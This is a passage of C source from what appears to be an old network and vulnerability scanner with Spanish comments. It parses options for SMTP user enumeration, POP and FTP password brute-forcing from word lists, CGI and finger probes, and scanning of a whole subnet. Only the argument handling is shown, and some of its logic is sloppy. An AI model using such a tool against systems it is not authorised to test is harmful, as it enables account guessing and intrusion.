   /*opciones*/
if(argc>3) 
    {
	if(strstr(argv[3],"d"))
	    {

               printf("What device would you like to use for the scan? (eth0,ppp0,etc):");
               scanf("%s",devi);
	       device=1;
	    }
      
        if(strstr(argv[3],"y")) 
	    {
	       expne=1;
	       control++;	 
	    }
      
        if(strstr(argv[3],"t"))
	    {
	       pop=1;
               control++;
            }
      
        if(strstr(argv[3],"e")) 
	    {
	       vrfye=1;
               control++;
	    }
      
        if(strstr(argv[3],"w"))
	    {
	       wu=1;
	       control++;
            }
      
        if(strstr(argv[3],"a")) 
	    {
	       ftpba=1;
	       control++;
            }
      
        if(strstr(argv[3],"f")) 
	    {
	       ftpb=1;
               control++;
            }
      
        if(strstr(argv[3],"c")) 
	    {
	       cgi=1;
	       control++;
            }
      
        if(strstr(argv[3],"i")) 
	    {
	       inteligente=1;
               control++;
            }
      
        if(strstr(argv[3],"n")) 
	    {
	       us=1;
               control++;
            }
      
        if(strstr(argv[3],"s")) 
	    {
	       sy=1;
	       control++;
            }
     
        if(strstr(argv[3],"p"))
	    { 
	       pini=0;
	       control++;
            }
	    
        if(strstr(argv[3],"l"))
	    {
	       lo=1;
               printf("Nombre del log: ");
	       scanf("%s",logname);
               if(strlen(logname)>20)
	                      {
	                  printf("Nombre del Log demasiado largo\n");
	                  exit(1);
	                       }
            }
      
        if(strstr(argv[3],"k")) 
	    {
	       finge=1;
	       control++;
            }
      
        if( strstr(argv[3],"0") && strlen(argv[3])==1)
	    {
	        control++;
            }
      
        if( control==0)
	    {
	       printf("Verifique las opciones\n");
	       menus();
            }

      
        if(argc<5 &&  no_options!=1)
	    {
               printf("Ingrese alguna ip/host para escanear\n");
	       exit(1);
	    }
	
	if(lo==1)
	    {
               if((salvar=fopen(logname,"w"))==NULL)
	       {
                   printf("error al crear el log file\n");
	           exit(1);
		}
	    }
      
/*leo la ip/host seleccionado*/
        host=gethostbyname(argv[4]);
     
        if (host==NULL) 
	    {
	       printf("Unknown host: %s\n",argv[4]);
	       exit(0);
	       ips=ntohl(inet_addr(argv[4]));
		 
            }
      /*los archivos de users y pass*/
        if((expne || pop || vrfye || ftpb ||finge) ==1 )
	    {
	       if (argc>4 && argc<6) 
	           {
	               printf("Ingrese -o  y los archivos necesarios\n");
		       exit(-1);  
	           }
	       else{
	               if((pop || ftpb)==1)
		           {
	                      sprintf(userlist,"%s",argv[6]);
	                      sprintf(passlist,"%s",argv[7]);
			      if((archivo=fopen(userlist,"r"))==NULL)
			      {
				printf("Imposible abrir userlist\n");
	             	        exit(1);
 		              }
	    		 if((archivo2=fopen(passlist,"r"))==NULL)
			     {
				    printf("Imposible abrir passlist\n");
				    exit(1);
		             }
		     fclose(archivo);
		     fclose(archivo2);
		 	}
	       else {
		    sprintf(userlist,"%s",argv[6]);

			if((archivo=fopen(userlist,"r"))==NULL)
			{
			    printf("Imposible abrir userlist\n");
			    exit(1);
		        }
	     fclose(archivo);
	             }
	           }
                 }
        rango1=atoi(argv[1]);
        rango2=atoi(argv[2]);

//seniales de interrupcion, etc.
	signal(SIGINT,kill_signal);
	signal(SIGHUP,kill_signal);
	signal(SIGQUIT,kill_signal);
//Ignoramos seniales de broken pipe
	signal(SIGPIPE, SIG_IGN);      

        if((rango1 > rango2) || (rango2<rango1) )
	    {
               printf("Verifique rango de puertos\n");
               exit(-1);
            }
  
        system("clear");
    }

/*Verifco si escanea una subnet, o un host solo*/
	if(us==1) 
	    {
	       e=1;
                  while(e!=255) 
		      {
    			if(e<255) {
	                sprintf(ipp,"%s.%d",argv[4],e);
    	    	        verifica3(ipp);
	       	        sleep(1);
	                memset(ipp,0x00,sizeof(ipp));
		        	  }
	                  e++;
    		      }
	    }
	    else {
        	verifica3(argv[4]);
	    }
    fina();
return 0;
}
